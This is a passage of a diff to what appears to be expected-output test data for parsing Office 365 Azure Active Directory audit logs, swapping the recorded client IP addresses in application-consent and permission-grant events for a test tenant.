Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -24059,9 +24059,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -24295,7 +24295,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -24325,9 +24325,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:42", "ExtendedProperties": [ { @@ -24562,7 +24562,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to 